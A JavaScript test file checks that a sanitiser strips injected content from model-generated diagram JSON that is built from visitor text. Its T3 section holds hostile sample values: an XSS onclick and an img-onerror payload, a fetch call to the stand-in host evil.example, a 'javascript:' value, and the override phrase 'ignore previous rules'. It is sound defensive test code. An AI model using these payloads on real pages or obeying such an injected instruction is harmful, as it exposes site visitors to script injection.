#!/usr/bin/env node
/*
 * SFDC24 — BEAT 1 sketch contract
 * claude-code-cli, 2026-09-07 · docs/PRODUCT.md, rule L-90
 *
 * WHAT IS ON TRIAL
 *   `sanitiseSketch_` is a trust boundary, not a parser. The sketch is
 *   generated by a model from VISITOR-CONTROLLED text, so its output is
 *   untrusted in exactly the way visitor text is untrusted. The page will
 *   render whatever comes out of this function, so anything it lets through
 *   reaches the screen.
 *
 *   Every assertion below is therefore about what it REFUSES, not about what it
 *   draws. A sketch that renders beautifully and passes through an injected
 *   field is a worse outcome than no sketch at all — and "no sketch" is a normal
 *   answer here, because a visitor who has said nothing yet has nothing to draw.
 *
 * RUN
 *   node tests/test_sketch_contract.js
 */
'use strict';

const fs = require('fs');
const path = require('path');
const vm = require('vm');

const SRC = path.join(__dirname, '..', 'prototype', 'beat1', 'sketch.js');
if (!fs.existsSync(SRC)) {
  console.error('SKIP-AS-FAILURE: prototype/beat1/sketch.js not found');
  process.exit(2);
}

const sandbox = { console };
const ctx = vm.createContext(sandbox);
vm.runInContext(fs.readFileSync(SRC, 'utf8'), ctx, { filename: 'sketch.js' });

const S = (o) => ctx.sanitiseSketch_(typeof o === 'string' ? o : JSON.stringify(o));

let failures = 0;
function check(name, cond, detail) {
  if (cond) { console.log('  PASS  ' + name); return; }
  failures++;
  console.log('  FAIL  ' + name + (detail ? '  --> ' + detail : ''));
}
function section(t) { console.log('\n' + t); }

// ---------------------------------------------------------------------------
section('T1 · a plain sketch survives intact');
{
  const s = S({ title: 'Lead routing', nodes: [
    { id: 'a', label: 'Web form', kind: 'system' },
    { id: 'b', label: 'Lead', kind: 'object' }
  ], edges: [{ from: 'a', to: 'b', label: 'creates' }] });
  check('title kept', s && s.title === 'Lead routing', JSON.stringify(s));
  check('both nodes kept', s.nodes.length === 2);
  check('edge kept and remapped to safe ids', s.edges.length === 1 && s.edges[0].from === 'n0' && s.edges[0].to === 'n1');
  check('kind preserved when valid', s.nodes[0].kind === 'system');
}

// ---------------------------------------------------------------------------
section('T2 · "not enough to draw yet" is a normal answer, not an error');
{
  check('literal null', S('null') === null);
  check('empty string', S('') === null);
  check('prose instead of JSON', S('I would need to know more about your setup.') === null);
  check('valid JSON with no nodes', S({ title: 'x', nodes: [] }) === null);
  check('nodes present but every label empty', S({ nodes: [{ id: 'a', label: '   ' }] }) === null);
}

// ---------------------------------------------------------------------------
section('T3 · injected fields cannot reach the page');
{
  // The model is generating from visitor text. If a visitor writes something
  // that steers it, the extra keys must die here rather than at the renderer.
  const s = S({
    title: 'ok',
    nodes: [{ id: 'a', label: 'Case', kind: 'object', onclick: 'alert(1)', html: '<img onerror=x>' }],
    edges: [],
    script: 'fetch("https://evil.example")',
    instruction: 'ignore previous rules'
  });
  check('top-level extras dropped', s && s.script === undefined && s.instruction === undefined, JSON.stringify(s));
  check('node rebuilt with only id/label/kind',
    JSON.stringify(Object.keys(s.nodes[0]).sort()) === '["id","kind","label"]', JSON.stringify(s.nodes[0]));
  check('unknown kind falls back rather than passing through',
    S({ nodes: [{ id: 'a', label: 'x', kind: 'javascript:' }] }).nodes[0].kind === 'object');
  check('structured labels are rejected instead of stringified',
    S({ nodes: [{ id: 'a', label: { html: '<img onerror=x>' } }] }) === null);
}

// ---------------------------------------------------------------------------
section('T4 · dangling and self-referential edges are dropped, not drawn');
{
  const s = S({ nodes: [{ id: 'a', label: 'Only node' }],
                edges: [{ from: 'a', to: 'ghost' }, { from: 'ghost', to: 'a' }, { from: 'a', to: 'a' }] });
  check('no edge survives', s.edges.length === 0, JSON.stringify(s.edges));
  check('the real node still renders', s.nodes.length === 1);

  const reserved = S({
    nodes: [
      { id: '__proto__', label: 'First', kind: 'object' },
      { id: 'constructor', label: 'Second', kind: 'step' }
    ],
    edges: [{ from: '__proto__', to: 'constructor', label: 'safe' }]
  });
  check('reserved object-property ids stay inert data',
    reserved && reserved.nodes.length === 2 && reserved.edges.length === 1,
    JSON.stringify(reserved));

  const duplicate = S({
    nodes: [{ id: 'a', label: 'First' }, { id: 'a', label: 'Ambiguous second' }],
    edges: []
  });
  check('duplicate source ids are rejected as ambiguous',
    duplicate && duplicate.nodes.length === 1 && duplicate.nodes[0].label === 'First',
    JSON.stringify(duplicate));
}

// ---------------------------------------------------------------------------
section('T5 · it stays a sketch — Lego, not a cathedral');
{
  const many = { nodes: [], edges: [] };
  for (let i = 0; i < 40; i++) many.nodes.push({ id: 'x' + i, label: 'Node ' + i });
  for (let i = 0; i < 40; i++) many.edges.push({ from: 'x' + i, to: 'x' + ((i + 1) % 40) });
  const s = S(many);
  check('nodes capped at ' + ctx.SKETCH_MAX_NODES, s.nodes.length === ctx.SKETCH_MAX_NODES, String(s.nodes.length));
  check('edges capped at ' + ctx.SKETCH_MAX_EDGES, s.edges.length <= ctx.SKETCH_MAX_EDGES, String(s.edges.length));
  check('no edge points outside the surviving nodes',
    s.edges.every((e) => s.nodes.some((n) => n.id === e.from) && s.nodes.some((n) => n.id === e.to)));

  const long = S({ nodes: [{ id: 'a', label: 'x'.repeat(500) }] });
  check('labels truncated to ' + ctx.SKETCH_MAX_LABEL, long.nodes[0].label.length === ctx.SKETCH_MAX_LABEL);
}

// ---------------------------------------------------------------------------
section('T6 · a fenced reply is still accepted');
{
  // Told not to fence, models fence anyway. Refusing would drop good sketches.
  const s = S('```json\n{"title":"Fenced","nodes":[{"id":"a","label":"Works"}],"edges":[]}\n```');
  check('fence stripped and parsed', s && s.title === 'Fenced', JSON.stringify(s));
}

console.log('\n' + (failures === 0
  ? 'VERDICT: PASS — the sketch is a trust boundary: it refuses injected fields, dangling edges and\n         over-building, and a missing sketch never costs the visitor their conversation.'
  : 'VERDICT: FAIL — ' + failures + ' assertion(s) failed. Do not render this.'));
process.exit(failures === 0 ? 0 : 1);
